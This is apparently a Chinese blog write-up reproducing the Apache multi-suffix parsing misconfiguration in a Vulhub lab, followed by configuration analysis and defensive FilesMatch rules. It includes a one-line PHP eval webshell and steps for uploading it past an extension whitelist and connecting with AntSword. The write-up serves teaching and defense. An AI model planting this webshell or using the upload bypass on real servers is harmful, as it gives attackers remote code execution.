Apache多后缀解析漏洞复现(apache_parsing_vulnerability)

已于 2022-10-13 21:34:56 修改
阅读量2.1k 收藏 7
点赞数 4
分类专栏: 靶场 apache 文章标签: apache 安全 中间件
于 2022-10-13 21:05:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WJ_11_13/article/details/127309346
版权

漏洞原理

 apahe解析文件时候有一特性,Apache默认一个文件可以有多个以点分割的后缀,apache会从最右边开始识别其后缀名,如遇无法识别的后缀名则依次往左进行识别
如果运维人员给.php后缀的文件添加了处理程序 `AddHandler application/x-httpd-php .php` 那么在有多个后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为PHP文件进行解析。
该漏洞和apache版本和php版本无关,属于用户配置不当造成的解析漏洞,

漏洞复现

这里我以Vulhub靶场为例演示

[root@localhost vulhub]# cd httpd/apache_parsing_vulnerability/     # 进入到apache_parsing_vulnerability 多后缀解析漏洞目录
[root@localhost apache_parsing_vulnerability]# docker-compose up -d   拉取镜像之后启动容器
# 注意
容器没起来可以先看看日志报错
[root@localhost apache_parsing_vulnerability]# docker logs apache_parsing_vulnerability_apache_1 
/bin/sh: 0: cannot open /var/www/start.sh: Permission denied
[root@localhost apache_parsing_vulnerability]# setenforce 0    #  关闭selinux之后docker-compose up -d重启容器
[root@localhost apache_parsing_vulnerability]# docker ps -s    # 查看正在运行中的容器(容器启动成功)
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES                                   SIZE
5c1134637b1f        php:apache          "docker-php-entryp..."   20 minutes ago      Up 5 seconds        0.0.0.0:80->80/tcp   apache_parsing_vulnerability_apache_1   2 B (virtual 459 MB)

# 浏览器访问靶场环境
http://10.10.10.133/

此漏洞只允许上传gif、png、jpg、jpeg后缀的文件,所以当上传php文件时会报错

 本地创建一个php后缀的一句话木马文件,内容如下:
<?php @eval($_POST['ggbond']);?>
之后上传,并且通过Bp抓取前端数据包,修改文件后缀名如图所示

蚁剑连接

通过蚁剑我们发现webshell成功连接
# 至于文件上传的路径,我们可以通过抓取数据包将其发送到repeater模块进行查看

 漏洞分析

我们进入容器查看一下配置文件
[root@localhost apache_parsing_vulnerability]# docker exec -it apache_parsing_vulnerability_apache_1 /bin/bash
root@5c1134637b1f:/var/www/html# cd /etc/apache2/conf-available/
root@5c1134637b1f:/etc/apache2/conf-available# ls
charset.conf  docker-php.conf  localized-error-pages.conf  other-vhosts-access-log.conf  security.conf    serve-cgi-bin.conf
root@5c1134637b1f:/etc/apache2/conf-available# cat docker-php.conf
AddHandler application/x-httpd-php .php      

DirectoryIndex disabled
DirectoryIndex index.php index.html                                                                  

<Directory /var/www/>
    Options -Indexes
    AllowOverride All
</Directory>

# 从上面php配置文件可知
AddHandler application/x-httpd-php .php      
此命令是并没有进行类似于正则等的安全设置,凡是有带.php后缀的都会将其交给application/x-httpd-php解析程序进行解析

漏洞防御手段

1、通过正则方式来对其进行限制;、在配置文件中添加如下内容,匹配样式为 .php. 的文件并拒绝访问(该漏洞环境配置文件位于漏洞环境目录的 conf/docker-php.conf 生产环境中按照具体情况而定)

<FilesMatch "\.php\.">
require all denied
</FilesMatch>

2、将原本的 AddHandler application/x-httpd-php .php 注释掉,然后利用正则表达式单独为.php的文件添加处理程序

<FilesMatch ".+.php$">
SetHandler application/x-httpd-php
</FilesMatch>

小彩蛋

去阿里云官网的工作台搜索“容器镜像服务”
加速器地址: https://zw51rs4m.mirror.aliyuncs.com
配置镜像加速器
针对Docker客户端版本大于 1.10.0 的用户
您可以通过修改daemon配置文件/etc/docker/daemon.json来使用加速器
sudo mkdir -p /etc/docker
sudo tee /etc/docker/daemon.json <<-'EOF'
{
  "registry-mirrors": ["https://zw51rs4m.mirror.aliyuncs.com"]
}
EOF
sudo systemctl daemon-reload
sudo systemctl restart docker
爱吃仡坨
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Apache漏洞复现
人若有志,就不会在半坡停止。
10-13 1550
的路径穿越符,当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->.,转换完成后会判断是否存在…如果路径中存在%2e./形式,就会检测到,但是出现.%2e/这种形式时,就不会检测到,原因是在遍历到第一个.字符时,此时检测到后面的两个字符是%2而不是./,就不会把它当作路径穿越符处理,因此可以使用.%2e/或者%2e%2e绕过对路径穿越符的检测实现目录遍历。复制路径进行访问,成功查看到phpinfo的信息,说明上传的文件被执行。
httpd已复现漏洞
qq_61142406的博客
05-28 728
CVE-2017-15715: 2.4.0~2.4.29 00截断,后缀名后面加0A,1.php后面加上一个空格,然后双击空格,右边出现hex进制,然后改成0A CVE-2021-41773: 目录穿越,Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越的目录,配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器。 文件读取 payl
【vulhub靶场】Apache 中间件漏洞复现
最新发布
M372109150的博客
05-10 1753
本文主要是对apache中间件漏洞复现,包括Apache HTTPD 换行解析漏洞(CVE-2017-15715)、Apache后缀解析漏洞apache_parsing_vulnerability)、Apache路径穿越漏洞(CVE-2021-41773)、Apache路径穿越漏洞(CVE-2021-42013)、Apache SSI 远程命令执行漏洞
中间件安全Apache常见漏洞
ZL_1618的博客
04-01 1773
简单介绍一下apache是什么,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将python等解释器编译到服务器中。ApacheHTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。apache
Apache后缀解析apache_parsing_vulnerability漏洞复现
weixin_51198941的博客
09-05 186
apahe解析文件时候有一特性,Apache默认一个文件可以有多个以点分割的后缀apache会从最右边开始识别其后缀名,如遇无法识别的后缀名则依次往左进行识别该漏洞Apache版本、PHP版本无关,属于用户配置不当造成的解析漏洞
Apache文件解析漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-01 672
使用Docker复现Apache文件解析漏洞1.使用Docker搭建环境1.首先拉取一个基础镜像2.启动一个容器3.进入容器4.更换apt源5.安装web环境6.启动apache7.检查环境是否部署完毕2.漏洞复现3.把Docker容器打包为镜像 1.使用Docker搭建环境 1.首先拉取一个基础镜像 docker pull ubuntu:18.04 2.启动一个容器 docker run -...
Apache HTTPD 多后缀解析漏洞复现
weixin_45911307的博客
04-12 936
Apache HTTPD 多后缀解析漏洞复现 拉取环境 访问网页 http://your-ip/index.php 直接上传.php文件不成功 尝试可以上传的文件类型,.jpg 在php文件后缀名后加上.jpg再上传 发现上传成功 访问这个上传的文件发现命令成功执行 漏洞原理:支持多后缀,只要文件后缀中有.php,就将文件解析成php文件 ...
html.rar_htmlparser_java parsing html
09-24
我们可以创建一个Java类,使用HTMLParser来解析这个文件: ```java import com.htmlparser.Parser; import com.htmlparser.beans.TagBean; import com.htmlparser.nodes.TagNode; import java.io.File; import ...
Calculate.rar_formula_parsing source
09-19
"Calculate.rar_formula_parsing source" 提供的源代码可能是一个实现公式解析的工具或库,这对于我们理解和构建自己的计算逻辑或自定义功能非常有帮助。公式解析源码通常涉及到编译原理和解析技术,包括词法分析、...
yf.rar_Follow_ Follow_parsing table_预测分析
09-19
构造实验一所给文法(应考虑改造)的FIRST集合和FOLLOW集合;构造LL(1)分析表;构造预测分析的总控程序;利用分析表、分析栈和总控程序对源程序进行自上而下的语法分输出整个语法分析过程中栈的变化过程及分析结果,...
html_paser.rar_html 解析
09-24
解析器通常分为两种类型:同步解析(Synchronous Parsing)和异步解析(Asynchronous Parsing)。 同步解析通常在加载整个HTML文档后开始工作,直到文档完全解析完成才会执行后续操作。这种方式适用于简单的页面和...
arp-parse_arp_parsing_Perl_
09-30
标题“arp-parse_arp_parsing_Perl_”和描述“test Windows shares to access”提示我们,这个主题涉及使用Perl语言进行ARP(地址解析协议)解析,并且可能与测试Windows共享资源的访问有关。ARP是网络层协议,用于...
vulhub之apache_parsing_vulnerability
u012871930的博客
03-17 199
apache_parsing_vulnerability
vulhub-httpd-apache_parsing_vulnerability
Ronin_qianmo的博客
07-27 403
1、漏洞描述 在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。 2、漏洞原理 Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件: AddType text/html .html AddLanguage zh-CN .cn 其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文
Apache文件解析漏洞
weixin_53696027的博客
02-27 1024
通过Ubuntu对Apache文件解析漏洞进行复现
NSSCTF实战:Apache HTTPD 多后缀解析漏洞
weixin_52270928的博客
05-17 522
Apache文件解析漏洞涉及到一个Apache解析文件的特性,Apache默认一个文件可以有多个以点.分割的后缀,当右边的后缀名无法识别,则继续向左识别。那么在有多个后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为php文件进行解析
11-3 Apache后缀解析漏洞分析
weixin_43263566的博客
11-24 1578
漏洞与用户的配置有密切的关系,严格来说属于用户配置问题。Apache文件解析漏洞涉及到 Apache 解析文件的特性。在默认情况下,Apache 允许一个文件具有多个以点分割的后缀,在处理文件时会从右向左识别后缀名。(就是右边的后缀名无法识别,则继续识别左边的)如果运维人员给具有 .php 后缀的文件添加了处理程序 AddHandler application/x-httpd-php .php,那么在文件具有多个后缀的情况下,只要文件含有 .php 后缀,该文件就会被识别为 PHP 文件并进行解析
SUPPORT_NEAR_OPTIMAL_PARSING
05-05
SUPPORT_NEAR_OPTIMAL_PARSING是一个用于自然语言处理的技术,旨在提供接近最优的句法分析结果。句法分析是将自然语言句子结构化的过程,它可以将句子分解成词汇和短语,并确定它们之间的关系。SUPPORT_NEAR_OPTIMAL...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值